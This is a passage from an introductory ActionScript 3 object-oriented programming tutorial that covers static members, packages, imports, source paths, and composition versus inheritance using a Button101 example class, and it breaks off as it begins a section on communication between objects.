subclasses to override part of the logic. [hannosch] - Remove the overly noisy migration report per folder. [hannosch] 1.0b7 - 2010-06-03 - Updated tests to not rely on the existence of the Large Plone Folder type, which was removed for Plone 4. [davisagli] 1.0b6 - 2010-05-02 - Nogopip vs. Acquisition take two - not all folders have a getOrdering method, so we need to avoid acquiring it. [hannosch] 1.0b5 - 2010-04-06 - Match getObjectPositionInParent behavior and handle unordered folders inside ordered folders shown in the navigation tree at the same time. [hannosch] 1.0b4 - 2010-03-06 - Don’t try to store an acquisition-wrapped catalog on the positional index. [hannosch] 1.0b3 - 2010-02-18 - Only apply monkey patch for reindexOnReorder on Plone 3.x & shortcut indexing completely if the fake index has been installed. [witsch] - Replace monkey patch for Catalog._getSortIndex with a fake index that can sort search results according to their position in the container. [witsch] - Add optimization for sorting results by folder position for the usual “all results in one folder” case. [witsch] - Add adapter for previous/next support that doesn’t need the catalog. [witsch] - Remove getObjPositionInParent catalog index and use a sort index based on the folder’s order information instead. [witsch] 1.0b2 - 2010-01-28 - Add IATBTreeFolder to implements list of ATFolder replacement. [thet] 1.0b1 - 2009-11-15 - Copy the index_html method from ATContentTypes to better support WebDAV. [davisagli] - Add in-place migration code. [witsch] - Work around imports no longer present in Plone 4.0. [witsch] - Briefly document the plone.app.folder.tests.bbb usage. [wichert] 1.0a1 - 2009-05-07 - Initial release as factored out from plone.folder. [witsch] - Author: Plone Foundation - Keywords: folder btree order plone archetypes atcontenttypes -, esteele, hannosch, timo, plone - Package Index Maintainer: esteele, davisagli - DOAP record: plone.app.folder-1.0.6.xml
https://pypi.python.org/pypi/plone.app.folder/1.0.6
CC-MAIN-2016-36
refinedweb
578
59.09
A simple scheduling system that lets you define jobs that get performed at various intervals. Use a virtual "poor man's cron" or a single Django management command to run the jobs. Project description A simple scheduling system that lets you define jobs that get performed at various intervals About Bambu Cron Bambu Cron makes it easy to define scheduled tasks that can run as rarely as once a year os often as once a minute. The syadmin only needs to add an extra line to the crontab file belonging to the user with permission to perform actions on the site, and and Bambu Cron will do the rest. Jobs are defined very simply, and a flag is set to alert the system that a job is running, so that frequent jobs that take longer than a minute to run, don’t run in parallel._cron rather than bambu_cron. Installation Install the package via Pip: pip install bambu-cron Add it to your INSTALLED_APPS list: INSTALLED_APPS = ( ... 'bambu_cron' ) Run manage.py syncdb or manage.py migrate to setup the database tables. Basic usage You define cron jobs and register them in a file called cron.py, which you add to your Django app. Only cron.py files found within an app referenced in the INSTALLED_APPS setting will be discovered. import bambu_cron class EmailDigestJob(bambu_cron.CronJob): frequency = bambu_cron.frequency.DAY def run(self, logger): # Send a digest email on a daily basis ... bambu_cron.site.register(EmailDigestJob) This registers the EmailDigestJob job. Once registered, you’ll need to call python manage.py cron --setup to allow Bambu Cron to store details of the job in the database. Documentation Full documentation can be found at ReadTheDocs. Questions or suggestions? Find me on Twitter (@iamsteadman) or visit my blog. Project details Download files Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
https://pypi.org/project/bambu-cron/
CC-MAIN-2018-51
refinedweb
317
67.35
This guide describes. For comprehensive reference documentation, see Windows Azure command-line tool for Mac and Linux Documentation. The Windows Azure Command-Line Tools for Mac and Linux are a set of command-line tools for deploying and managing Windows Azure services. The supported tasks include the following: For a complete list of supported commands, type azure -help at the command line after installing the tools, or see the reference documentation. azure -help The following list contains information for installing the command-line tools, depending on your operating system: Mac: Download the Windows Azure SDK Installer. Open the downloaded .pkg file and complete the installation steps as you are prompted. Linux: Install the latest version of Node.js (see Install Node.js via Package Manager), then run the following command: npm install azure-cli -g Note: You may need to run this command with elevated privileges: sudo npm install azure-cli -g Windows: Run the Winows installer (.msi file), which is available here: Windows Azure Command Line Tools. To test the installation, type azure at the command prompt. If the installation was successful, you will see a list of all the available azure commands. azure To use the Windows Azure Command-Line Tools for Mac and Linux, you will need a Windows Azure account. Open a web browser and browse to and click free trial in the upper right corner. Follow the instructions for creating an account. Some Windows Azure features are only available on request as they are currently in preview. To see a list of features that are in preview, select the preview features link from your account settings: To gain access to any of the listed previews, select the try it now button beside the item, select your subscripton from the list, and then select the checkbox. To get started, you need to first download and import your publish settings. This will allow you to use the tools to create and manage Azure Services. To download your publish settings, use the account download command: account download azure account download This will open your default browser and prompt you to sign in to the Management Portal. After signing in, your .publishsettings file will be downloaded. Make note of where this file is saved. .publishsettings Next, import the .publishsettings file by running the following command, replacing {path to .publishsettings file} with the path to your .publishsettings file: {path to .publishsettings file} azure account import {path to .publishsettings file} You can remove all of the information stored by the import command by using the account clear command: import account clear azure account clear To see a list of options for account commands, use the -help option: account azure account -help After importing your publish settings, you should delete the .publishsettings file for security reasons. When you import publish settings, credentials for accessing your Windows Azure subscription are stored inside your user folder. Your user folder is protected by your operating system. However, it is recommended that you take additional steps to encrypt your user folder. You can do so in the following ways: user You are now ready to being creating and managing Windows Azure Web Sites and Windows Azure Virtual Machines. To create a Windows Azure web site, first create an empty directory called MySite and browse into that directory. MySite Then, run the following command: azure site create MySite --git The output from this command will contain the default URL for the newly created web site. The --git option allows you to use git to publish to your web site by creating git repositories in both your local application directory and in your web site's data center. Note that if your local folder is already a git repository, the command will add a new remote to the existing repository, pointing to the repository in your web site's data center. --git Note that you can execute the azure site create command with any of the following options: azure site create --location [location name] --hostname [custom host name] You can then add content to your web site directory. Use the regular git flow (git add, git commit) to commit your content. Use the following git command to push your web site content to Windows Azure: git add git commit git push azure master To set up continuous publishing from a GitHub repository, use the --GitHub option when creating a site: --GitHub auzre site create MySite --github --githubusername username --githubpassword password --githubrepository githubuser/reponame If you have a local clone of a GitHub repository or if you have a repository with a single remote reference to a GitHub repository, this command will automatically publish code in the GitHub repository to your site. From then on, any changes pushed to the GitHub repository will automatically be published to your site. When you set up publishing from GitHub, the default branch used is the master branch. To specify a different branch, execute the following command from your local repository: azure site repository <branch name> App settings are key-value pairs that are available to your application at runtime. When set for a Windows Azure Web Site, app setting values will override settings with the same key that are defined in your site's Web.config file. For Node.js and PHP applications, app settings are available as environment variables. The following example shows you how to set a key-value pair: azure site config add <key>=<value> To see a list of all key/value pairs, use the following: azure site config list Or if you know the key and want to see the value, you can use: azure site config get <key> If you want to change the value of an existing key you must first clear the existing key and then re-add it. The clear command is: azure site config clear <key> To list your web sites, use the following command: azure site list To get detailed information about a site, use the site show command. The following example shows details for MySite: site show azure site show MySite You can stop, start, or restart a site with the site stop, site start, or site restart commands: site stop site start site restart azure site stop MySite azure site start MySite azure site restart MySite Finally, you can delete a site with the site delete command: site delete azure site delete MySite Note that if you are running any of above commands from inside the folder where you ran site create, you do not need to specify the site name MySite as the last parameter. site create To see a complete list of site commands, use the -help option: site azure site -help A Windows Azure Virtual Machine is created from a virtual machine image (a .vhd file) that you provide or that is available in the Image Gallery. To see images that are available, use the vm image list command: vm image list azure vm image list You can provision and start a virtual machine from one of the available images with the vm create command. The following example shows how to create a Linux virtual machine (called myVM) from an image in the Image Gallery (CentOS 6.2). The root user name and password for the virtual machine are myusername and Mypassw0rd respectively. (Note that the --location parameter specifies the data center in which the virtual machine is created. If you omit the --location parameter, you will be prompted to choose a location.) vm create myVM myusername Mypassw0rd --location azure vm create myVM OpenLogic__OpenLogic-CentOS-62-20120509-en-us-30GB.vhd myusername --location "West US" You may consider passing the --ssh flag (Linux) or --rdp flag (Windows) to vm create to enable remote connections to the newly-created virtual machine. --ssh --rdp If you would rather provision a virtual machine from a custom image, you can create an image from a .vhd file with the vm image create command, then use the vm create command to provision the virtual machine. The following example shows how to create a Linux image (called myImage) from a local .vhd file. (The --location parameter specifies the data in which the image is stored.) vm image create myImage azure vm image create myImage /path/to/myImage.vhd --os linux --location "West US" Instead of creating an image from a local .vhd, you can create an image from a .vhd stored in Windows Azure Blob Storage. You can do this with the blob-url parameter: blob-url azure vm image create myImage --blob-url <url to .vhd in Blob Storage> --os linux After creating an image, you can provision a virtual machine from the image by using vm create. The command below creates a virtual machine called myVM from the image created above (myImage). azure vm create myVM myImage myusername --location "West US" After you have provisioned a virtual machine, you may want to create endpoints to allow remote access to your virtual machine (for example). The following example uses the vm create endpoint command to open external port 22 and local port 22 on myVM: vm create endpoint azure vm endpoint create myVM 22 22 You can get detailed information about a virtual machine (including IP address, DNS name, and endpoint information) with the vm show command: vm show azure vm show myVM To shutdown, start, or restart the virtual machine, use one of the following commands: azure vm shutdown myVM azure vm start myVM azure vm restart myVM And finally, to delete the VM, use the vm delete command: vm delete azure vm delete myVM For a complete list of commands for creating and managing virtual machines, use the -h option: -h azure vm -h
http://www.windowsazure.com/en-us/manage/linux/how-to-guides/command-line-tools/
CC-MAIN-2013-20
refinedweb
1,615
57.71
Native PDF import for Inkscape, using Poppler Bug Description I was recently reading through the source code for the Cairo backend for Poppler (fd.o PDF reader), and it struck me that it would be pretty easy to create an SVG backend that could be used by Inkscape to read PDF files directly. Native PDF import could be one of the most useful features of Inkscape, if it were implemented. I know there are some issues when reading PDF with preserving groupings of objects, unflowing text objects, etc., but getting anything editable out of a PDF would be great. The Poppler backend API seems like it could be a pretty straightforward system for creating a DOM tree without too much effort. Alan, the last spec for AI file format I read was mentioning rather EPS than PDF in its header ;) from the header of an .ai file produced by AI 11: %PDF-1.4% %Creator: Adobe Illustrator(R) 11.0% Yes, recent versions of AI save in PDF format by default, but with a ".ai" extension. You can actually open the files in Acrobat Reader. I suspect that they use a specific subset of PDF, and it's possible that there is certain extended info that AI hides in the PDF, that only AI knows how to interpret, somewhat like what Inkscape does with SVG. However AI doesn't do a bad job of importing just about any PDF file. It turns out that most professional printers around where I am now deal exclusively with PDF for everything they do. They still have tools for importing TIFF, PS, etc., but they prefer PDF because there are very powerful tools to resize, crop PDF now, and powerful color management facilities in PDF. So it appears AI realized this upcoming wave and just switched to PDF at an internal level, because they realized it would be very important to be able to read PDF in the future. How about setting up a project at sourceforge that provides the PDF import facility? At least a framework apps like Inkscape, Gimp, K*, ... can hook in to support import of PDFs? > At least a framework apps like Inkscape, Gimp, K*, ... can hook in to support import of PDFs? That is the idea of using poppler http:// Originator: NO I would rather go for PoDoFo (at sourceforge). Scribus developers are after it. Originator: NO I am really happy to close this request, because Inkscape now imports both PDF and pdf-based AI files using poppler. Details are here: http:// This has been released long ago. The GIMP developers are exploring something simliar /msg09705. html http://<email address hidden> Given the Adobe Illustrator format is PDF based it might be worth explorering for those interested in bieng able to import AI files. (You might want to add a comment in those bug reports, directing people to this request) I hope a developer will take an interest in this but there is so much to do and so little time to do it who know what will happen.
https://bugs.launchpad.net/inkscape/+bug/sf1197549
CC-MAIN-2019-35
refinedweb
510
70.84
For this mega-installment of our introduction to Object-Oriented Programming in ActionScript 3, we'll take a look at a few outstanding topics, as well as putting everything together and organizing a simple project around several independent, yet cooperative, objects. If you've been following along with the AS3 101 series so far, you'll have no problem with the general techniques involved in this tutorial. You'll get to focus on how the various elements of the entire Flash movie interact with each other and learn the fundamentals of building Object-Oriented applications. If you find this is a bit over your head, I would advise you to backtrack and brush up on the other topics covered by this series, namely those involving working with XML, loading external images, and the first two parts of this OOP series. Step 1: Welcome Back I'm going to start this tutorial by talking about about a few concepts that didn't make it into the previous OOP tutorials. The idea of static members, packages, imports, source paths, and composition are all going to be necessary for both the image viewer project as well as your general on-going Object-Oriented Programmer lifestyle. As with most of my AS3 101 tutorials, we'll focus largely on the concepts and the theory first, and then utilize them in a more practical manner later. Step 2: Static Cling All of the properties and methods that we have been writing so far are known as instance properties (or instance methods, as appropriate). What does that mean? That the properties and methods belong to the instance. Remember how we said that all houses built from the same blueprint have a front door, but that the characteristics of the door might be unique on a per-house basis? Yeah, that was a long time ago, way back up at the beginning of the first OOP tutorial, but that's what an instance property is. Each instance can have its own, unique value stored in that variable. It's possible to give one Button101 instance a label of "Abracadabra" and another instance a label of "Hocus Pocus". Because each object has its own property, each instance has its own value stored in it. However, what if you just need a place to store a value, a value that doesn't need to change independently with each object that is instantiated? What if Button101 had a corner radius property that you wanted to keep consistent across all button instances, so that all buttons had a consistent appearance? If that's the case, then why does every instance need its own copy of the same value? It doesn't. If we're confident that all instances will be able to share the same value, then we can have all instances actually share the same property. We do this by declaring the property as being static. That means that the property (or method, if you were to do the same thing to a method) doesn't belong to the instance, but to the class. This is like stating on the blueprint that all houses must have a red-painted wooden door. What this looks like in practice is this: private static var cornerRadius:Number = 5; All we did is add the static keyword. That turns it into a class property (or, again, a class method). These are also called static properties (or... yeah, you get the idea). Note that, like the override keyword, the order between static and public/private/internal/protected is inconsequential. Again, though, it's wise to pick a standard and stick with it. If we do this (declare the property as static, not pick a standard), then all instances will have the same value for cornerRadius. This isn't a copy of the value; this is actually a reference to the same value across all instances. Why do this? Well, for one, there are places where it just makes sense. In the scenario outlined in this step, it makes sense, because we never have a variation in that particular value. For another, declaring properties or methods as static can reduce memory usage. Since the property points to a single value in memory, and not unique instances of similarly-named values, there is a smaller impact on memory. Obviously, in our simple example, creating a single Number variable instead of two is hardly worth considering, but in cases where objects are created several times over and the value contained within a property is a significant data structure, then static properties might produce a meaningful savings. Keep an eye out for a tangential discussion of the when to use static methods and properties in the near future. For a more in-depth look at when to utilize static methods and properties, look out for a soon-to-be-published Quick Tip on Activetuts+. Step 3: Packages Another leftover is the notion of packages. We've been blithely unaware of packages until now, but I think you're ready to handle it. Packages are just a way of organizing your code intro group and sub-groups. And it has a lot to do with that package keyword that starts off every class file. Technically, we've been using packages all along. It's impossible not to; that package keyword defines the package to which your class belongs. However, we've been using what's called the top-level package. When you write this: package { // Class code here... } You're placing your class in the top-level package. For various reasons, though, you might want to start putting your class files in folders. Organization is probably the most common reason; you'd like to keep various aspects of a project grouped together and segregated from one another, as necessary. You may also wish to reuse a class name. If you could keep the Main class of one SWF in a separate folder from the Main class of another SWF, then you could use the name twice. Packages are just the way your classes are organized into folders. It's a two-step process: first you need to create your file in a folder structure reflecting the organization you desire. Then you mirror the folder structure after the package keyword in your class file. Step 4: Create an Example Package We'll create a sample package right now, to illustrate how this is done. We'll actually retrofit the previous tutorial's project to use packages. If you don't have those files handy, a copy of it can be found in the download package as "button_tutorial." In your file system, create a folder to house the entire project. Copy the Flash file into this folder Create a series of folders within that folder. They should follow this structure: - [project folder]/ - as3101/ - sample/ - ui/ Now, in the as3101/sample/ folder, copy the DocumentClass file . Copy the Button101 class to the as3101/ui/ folder. That's the first part; we've got an organizational scheme on our filesystem. Now we need to edit those two files so that the package matches this folder structure. Open up DocumentClass, and edit the first line to read: package as3101.sample { Similarly, open up Button101 and make the first line read: package as3101.ui { In other words, we edited the files so that the bit between package and the opening curly brace reflects the folder structure leading to the class file itself, relative to the Flash file. We use dots to separate the folder elements, though, not slashes or backslashes. Note that the class name itself is not included; the package is just the enclosing folders. The class name is still listed after the class keyword. As an organizational technique, this opens up many more possibilities for structuring your projects. As you write more and more classes, you'll want to group related classes together and create hierarchies of groupings. Packages will let you do just that. However, we're not done here; if you try to run the project right now you'll get nothing; because we've moved the DocumentClass, the Flash file can't find it anymore. Step 5: Fully-Qualified Class Names One subtle point that's worthwhile to keep in mind is that as soon as you use a package, your class name got more complex. Now, for all intents and purposes, our two classes are still called " DocumentClass" and " Button101." When you discuss them with other team members, you can refer to them by those names, and even in code you can still use those names. However, technically, the use of a package turns the class name into a longer name. The name becomes package + "." + class name. That is, our DocumentClass is really as3101.sample.DocumentClass, and Button101 is really as3101.ui.Button101. This is known as the fully-qualified class name, and it will play an important part in organizing our class files. You may also see it in this form: as3101.ui::Button101. This doesn't really mean anything different from the all-dot version. Just know how to read it (you'll see this most commonly when runtime error occur, the error describes the classes in which the error occurred). So, why does our Flash document now do nothing? Because, in the document properties, the Document Class is set to DocumentClass. But our class is actually called as3101.sample.DocumentClass. Normally, this kind of mis-naming causes a compiler error, but in this situation Flash is trying to be helpful. It knows to look for a class called DocumentClass to be the Flash file's document class. But it can't find it (that exact class name no longer exists since we've moved the class to a package). So, Flash silently creates a document class, called DocumentClass for us. As it happens, this class does nothing except extend MovieClip and be called DocumentClass. Therefore, if we hit "Test Movie," we get nothing; an empty SWF, reflective of the empty document class created for us. Before we correct this, first prove this by opening up the publish settings (File > Publish Settings…) for the document. Click on the "Settings…" button next to the "Script: ActionScript 3.0" control. In the resulting window, click on the checkmark button next to the "Document class:" input: This will result in the following error message: This is Flash's way of saying the same thing I just told you. Only Flash won't tell you that unless you take some kind of action like we just did. To set things right, change the value of that Document class field to as3101.sample.DocumentClass. When you press Return, nothing should happen (the other option is to get a similar warning dialog). When you click the pencil icon, you should see the class open up. These both mean we have successfully re-linked our Flash file to its newly re-named document class. However, if you test now, things still don't work. On the bright side, you will at least get some errors saying why things don't work: In effect, we're experiencing the same problem with the Button101 class as we were with the DocumentClass. Step 6: Imports Once you start putting classes into packages, you suddenly need to deal with telling Flash where to find them. Be wary of the issue uncovered in the last step, but fortunately everywhere else the matter of telling Flash where to find classes is a simple line of code. This is the import statement. You've already used them, and can probably already guess why they're there. We've written quite a few import flash.display.Sprite; sorts of lines in the last two tutorials, but now we get to write them for our own classes. The error produced at the end of the last step said something about a type not being found: Button101. That might be a little confusing (and admittedly, Adobe's compiler errors tend to be worded in a less-than-helpful way). This just means that we've used something called Button101 but never defined what that is. We're using a class, but we're not using that fully-qualified name to point Flash in the right direction. You might assume that all you need to do is something like this: var button:as3101.ui.Button101 = new as3101.ui.Button101(); It's not that there's something wrong with using the fully-qualified name, but it does not solve the problem at hand. In order to let Flash know where this newly-relocated Button101 class is, we need to import it. import lines need to go before the class declaration. That it, after the package opens, but before the class opens. Like this: package as3101.sample { // Imports go here. public class DocumentClass extends MovieClip { // ... They can be in any order you like, but they need to be grouped in that spot. Most developers take the time to alphabetize their import statements (in fact, Flash Builder does this for you). Now, to solve our current problem, we just import the Button101 class: package as3101.sample { import as3101.ui.Button101; // Other imports... public class DocumentClass extends MovieClip { // ... Note that once a class has been imported using its fully-qualified name, it is available to the class by it's short name. So, the lines that read var button:Button101 = new Button101(); don't need changed. There's nothing wrong, per se, with using the fully-qualified name at this point. But the import allows us to use the shorthand name, which means we have less characters cluttering up the code, which is a good thing. Test the movie now, and, with Flash aware of where the various classes are located, you should be back in business. One little extra note on imports: you technically don't need to write import statements for classes that are in the same package as the class doing the importing. It won't hurt anything to include them, though, and in my mind, the self documenting nature import statements makes that a worthwhile practice. The finished files for this example (including the package change, the inclusion of imports, and the updated FLA to reflect the new Document class) are in the download package as "button_tutorial_packages". To summarize these points on imports: - If the class you want to use is in a different package, you must use the importstatement. - This allows you to use the "short name" of the class, but it's OK to use the fully-qualified name if you need to. - If the class you want to use is in the same package, the importstatement is not required, but it's OK to use it if you want. Step 7: Wildcard Imports Now, you should know there are two ways to import a class. One is the way we just did: list the class using its fully-qualified name. However, you may opt to use the wildcard import. It looks like this: import as3101.ui.*; And it does what you probably expect it to. Any class inside of the ui package is now available to the class doing the import by its short name. There are a few things to note about this technique. - You can't do this: import as3101.*;. That won't get you anything. Wildcards only import classes that are direct children of the package specified. Since Button101 and DocumentClass are both members of sub-packages of as3101, we would achieve nothing by that attempt. - Using the wildcard does not automatically compile every class in the package into your SWF. I repeat: it does not. The Flash compiler is smart enough to compile only the classes that it sees are being used by your SWF. You do not need to worry about needless filesize increases by using the wildcard. Knowing this, using wildcards or not should become a personal preference. Personally, I only use them on the Flash Player classes (the ones that start with flash.…). In those cases, I use so many flash.net or flash.display classes that it's just easier to make sure they're all available without having to trot back to the import section and add a new import. However, with the classes that I write, I find it useful to specifically list the imports individually, as a form of documentation. You can look at the import section and see on which other classes this particular class relies. The choice is up to you, however, and I'd advise you determine your convention and stick to it. I will be writing a Quick Tip that delves deeper into imports. That will be released before long, so keep your ear to the ground if you'd like to know more about the subtler details of import statements. For a deeper discussion on wildcard imports keep an eye out for a coming Activetuts+ Quick Tip on the subject.. Step 8: Source Paths If we're going to talk about using packages to organize our class files, we should then extend the discussion to source paths. A source path is a directory in which Flash will look for classes to compile. By default, every Flash document knows to look in the Flash document's own directory for class files. This is why our examples have worked so far; our classes have always been in the same folder as the Flash document (keep in mind that our recent venture into packages technically puts the class file into another folder, but that the fully-qualified class name resolves the class to a series of folders plus the file. And the root folder of our packages is in the same folder as the Flash document). Now, there are any number of reasons why you'd want to store classes in some other directory. Two of the most common are: - You have reusable utility classes (possibly TweenMax, Away3D, or something useful you've written). You want to use these classes across all projects, and don't want to have to copy the files from one project to the next. - You would like to organize your project so that, for whatever reason, your Flash files are in a different directory from your class files. This actually makes sense when you have a large project involving many Flash files. Just to keep the project structure clearer, you might decide to keep a "classes" folder and a "flas" folder. This way Flash files are grouped together, but can still share classes common across the project. Naturally, you can accomplish these tasks. I wouldn't have brought them up if you couldn't. I'm mean, but not that mean. And, of course, you have two options for doing this. Both involve defining a source path. You can define them at the application level (in which case the source path is available to every Flash document you open on that machine), or at the document level (in which case the source path is only available to that document). In the case of reason #1 above, the application level source path makes sense. As for reason #2, the document level source path would be better. To Define an Application-Level Source Path Open your Flash preferences (on the Mac: Flash > Preferences; on the PC: Edit > Preferences). Click on the ActionScript category on the left. At the bottom of the resulting window, click on the "ActionScript 3.0 Settings…" button. In the resulting window, there are three areas: source paths is the top one. Click on the "+" button and type in your path. Or click on the folder button to browse to it. However you enter it, once it's there, click OK until you're back to Flash. At this point, you can freely import and use any class from that directory. To Define a Document-Level Source Path With the document open, open the Publish Settings (go to File > Publish Settings…). Click on the "Flash" tab. Click on the "Settings…" button next to the ActionScript version control. A new window opens up, and this will be very similar to the window you get with the application preferences. It's layout is a bit different, but the idea is the same. Make sure you're on "Source Path" and type in your path. Click "OK" and remember that this is for this document only. Between packages and source paths, you have many options for organizing your classes. Step 9: Composition In the previous tutorial, we focused quite a bit on inheritance. There is a technique that might be considered oppositely-wound from inheritance. It's called composition. Now, there is nothing wrong with inheritance. It's not like I sat of a throne of lies and fed you malicious taradiddle in that last tutorial. But you might come across the phrase "prefer composition over inheritance" in your Object-Oriented journey. If (when) you get to learning design patterns you will most certainly hear it, and you will even see it manifest if you hang around advanced coders long enough. Big Spaceship recently (as of this writing) posted a discussion of the methodology they used when designing the display package of their github-ed ActionScript library. In it, they explain their reasons for, essentially, composition instead of inheritance. So what is it? The good news is that you already know how to do it, and have been doing it all along. Composition is just when one object stores another object in a property. If your class has a property called myLoader, and stores in it a Loader object, that your class is said to compose the Loader object. This happens all the time; the Loader itself, in fact, has a contentLoaderInfo property that, itself, composes a LoaderInfo object, which gives you information about the actual loading. Step 10: The Subtle Difference Composition seems like a far cry from inheritance, doesn't it? The two probably don't seem related at all. But consider this: In the last tutorial, we spent most of the time making a Button101 class that extended Sprite. This made it everything that Sprite is (and everything a DisplayObject is, and everything a DisplayObjectContainer is, and…, well, you remember that discussion). This was certainly useful, and again, I'm not here to tell you that it was the wrong way to do it. But an alternate way to do it would be to not extend anything in particular, and instead let the Button101 class instantiate its own Sprite object, or receive a target Sprite object as a constructor parameter, or in some way compose the Sprite and not inherit it. How this would work may not be immediately clear. Allow me to throw a bunch of code at you in a shotgun-like effort to make this more clear. First, let's consider the original implementation. Here is, in full, the Button101 class from the last tutorial (you may find the project in the "button_tutorial" folder in the download package): package { import flash.display.Shape; import flash.display.Sprite; import flash.events.MouseEvent; import flash.text.TextField; import flash.text.TextFormat; public class Button101 extends Sprite { private var bgd:Shape; private var labelField:TextField; private var _url:String;; } override public function set width(w:Number):void { labelField.width = w; bgd.width = w; } override public function set height(h:Number):void { labelField.height = h; labelField.y = (h - labelField.textHeight) / 2 - 3; bgd.height = h; } } } And here is the snippet of code from the DocumentClass class that set up a Button101: button = new Button101(); button.x = 10; button.y = 200; button.label = "Active Tuts"; button.url = ""; addChild(button); button.addEventListener(MouseEvent.CLICK, onButtonClick); Now, here is equivalent code, only utilizing composition instead of inheritance. This is the updated Button101 class (changed and added lines are highlighted): package { import flash.display.Shape; import flash.display.Sprite; import flash.events.MouseEvent; import flash.text.TextField; import flash.text.TextFormat; public class Button101 { private var _target:Sprite; private var bgd:Shape; private var labelField:TextField; private var _url:String; public function Button101() { _target = new Sprite(); bgd = new Shape(); bgd.graphics.beginFill(0x999999, 1); bgd.graphics.drawRect(0, 0, 200, 50); _target.addChild(bgd); labelField = new TextField(); labelField.width = 200; labelField.height = 30; labelField.y = 15; var format:TextFormat = new TextFormat(); format.align = "center"; format.size = 14; format.font = "Verdana"; labelField.defaultTextFormat = format; _target.addChild(labelField); _target.addEventListener(MouseEvent.ROLL_OVER, onOver); _target.addEventListener(MouseEvent.ROLL_OUT, onOut); _target.mouseChildren = false; _target; } public function set width(w:Number):void { labelField.width = w; bgd.width = w; } public function set height(h:Number):void { labelField.height = h; labelField.y = (h - labelField.textHeight) / 2 - 3; bgd.height = h; } public function get target():Sprite { return _target; } } } And here is the updated snippet of code required to set up the updated Button101 (again, changes are highlighted): button = new Button101(); button.target.x = 10; button.target.y = 200; button.label = "Active Tuts"; button.url = ""; addChild(button.target); button.target.addEventListener(MouseEvent.CLICK, onButtonClick); It's not much more code. It's more about the addition of the _target property and the usage of it instead of the implicit this where Sprite-like things were concerned. Here's a more thorough breakdown: - First, on line 8, we remove the extends Spritebit so that we're not utilizing inheritance. - On line 10, we added the targetproperty. This will store our Sprite (that is, it composes the Sprite) that was previously being inherited. This sets up with composition, and not inheritance. - On line 17, the first line of the constructor, we create a new Spriteand stash it in our _targetproperty. At this point, we're successfully using composition. - On lines 22, 33, and 35-39, we've simply added a reference to _targetin front of method calls that were previously supplied by the Spritesuperclass. Because we're not extending Spriteanymore, we no longer have an addChildor addEventListenermethod, or mouseChildrenor buttonModeproperties. We do, however, have a Spriteon which we can call those things, so we transfer the responsibility there. - In lines 67 and 71, we need to remove the overridekeyword, as we're not extending anything, so there's nothing to override. - At the end of the class (lines 77-79), we add a whole new method. It's a getter function that returns a reference to the composed Sprite. This step is crucial for the changes in DocumentClass. - In DocumentClass, the changes all involve directing Sprite-like behavior to the targetof the button, rather than to the button itself. For example, on lines 2 and 3, rather than positioning the button object, we position the target of the button. Similarly, we can't add buttonas a child to the display list, but we can add button.target. Then end result should be identical. The difference is under the hood, in how that Button101 is set up. Actually, the end result doesn't work without some extra modifications, as the click handler needs a little extra attention. Explaining the required changes is a bit beyond the scope of this tutorial, but you can find a fully-working example in the download package under "button_tutorial_composition" Step 11: "Has-a" and "Is-a" So, if both inheritance and composition are acceptable techniques, how do you know when to use which? Well, first, there's the archetypal answer, mentioned earlier, of "prefer composition over inheritance." If you feel you have the option of going with either, you might want to err on the side of composition, if only because you know some curmudgeony old tutorial writer who told you do so. In all seriousness, though, you can trust that people smarter than you (and smarter than me) have come up with that preference idiom, and there's no reason not to take their word for it. But how about some more practical advice? A popular technique for evaluating the appropriateness of inheritance versus composition is the "Has-a"/"Is-a" test. It goes like this. You take the names of your two classes (for the moment we'll pretend they are "ClassA" and "ClassB") and try them out in the following sentences: ClassB is a ClassA. ClassB has a ClassA. And take note of the one that is a more appropriate relations. If is a is more appropriate, then the relationship is one of inheritance. If has a is more appropriate, then it's a compositional relationship. For example, let us consider the built-in TextField class. Say the following out loud (loudly, and with conviction, especially if you're in a crowded room). A TextFieldis a DisplayObject. A TextFieldhas a DisplayObject. To me, at least, the is a relationship makes more sense. The TextField is displayable, so it is a DisplayObject. Now TextField's can also style their text, by way of the TextFormat class. What about the following: A TextFieldis a TextFormat. A TextFieldhas a TextFormat. At this point, we hopefully agree that it makes more sense for the TextField to utilize (have) a TextFormat. It's a useful component of a TextField, but a TextField isn't, itself, defined by being a TextFormat. Let's think about another example – the built-in Loader class. Keep in mind that Loader is a type of display object that can load external content. Let's try out the following statements: A Loaderis a DisplayObject A Loaderhas a DisplayObject If you answered that the is a relationship makes more sense, you're right. The Loader is, itself, displayable. If you answered that the has a relationship makes more sense, you're also right! There are no losers here at AS3 101 Camp! The Loader has a property called content which is the displayable content that was loaded. One more example, then we'll drop this theoretical discussion. Let's use our previous Button101 in the test: A Button101is a Sprite. A Button101has a Sprite. Well, this is our debate from the previous step, isn't it? Which makes more sense? To me, either makes sense. The button could very well be a DisplayObject of some type, or it could be something else and merely control the DisplayObject in question. In this particular example, I think the answer depends a little on personal preference. For the record, my preference is to favor composition. You may draw your own conclusions, but remember that every time you choose inheritance, God kills a kitten. (Yes, that was a joke. Personally, I don't believe in kittens.) You can learn more by searching for "inheritance versus composition" or "prefer inheritance over composition." Many of the results I spotted were on the intermediate-to-advanced technical side, but if you crave a deeper discussion on this topic, Google can help you out. Step 12: The Ultimate Mnemonic Device If you need a more visual explanation of Inheritance and Composition, then consider the following. Inheritance is like Robocop. He is a typical human extended with extra functionality. Or put another way, he is a robot that inherits core functionality from a human. Composition is like Michael Knight and KITT. Michael Knight is a typical human, and remains a typical human, only he owns (composes) a self-aware car. Both are totally rad, but they've arrived at their respective awesomeness through different techniques. But of the two, only the Hoff went of to star in Baywatch. Therefore, prefer composition over inheritance. (I should point out that I did not come up with this analogy, but I am at a loss for locating the original source. If anyone knows, please let us know in the comments) Step 13: Communicate My point in bringing up composition has more to do with assembling a larger program out of objects, rather than getting into a discourse on the finer points of whether it's appropriate over inheritance in various situations. Those finer points are important, and you'll be running into them many times over as you grow as an Object-Oriented developer, but right now we need to see how we put our Object-Oriented Programming techniques to use in building a larger application. The most common frustration and confusion I see in budding OOP developers is over the communication between various objects. Most people at this point in their education understand classes and objects, and how to write a given class. The next step is to start using multiple classes and objects to create something useful (like a website), but it seems that the natural confusion comes from learning that objects are meant to be encapsulated (remember that discussion? It was covered in my first OOP tutorial). Then how does one object talk to another object, so that a system can be created, out of which that useful program can be built? Most first attempts I've witnessed involve either terrible, terrible violations of the encapsulation principle, of the scope of responsibility for a given class, or both. Or else the attempts simply do not work. I would like to take the time (and article space) to show you an example of a poorly-written system of objects. Step 14: The Code In This Step is Questionable, Please Do Not Bother to Type It Out For Yourself. We Are Illustrating Less-Than-Ideal Technique. I hope the heading made the 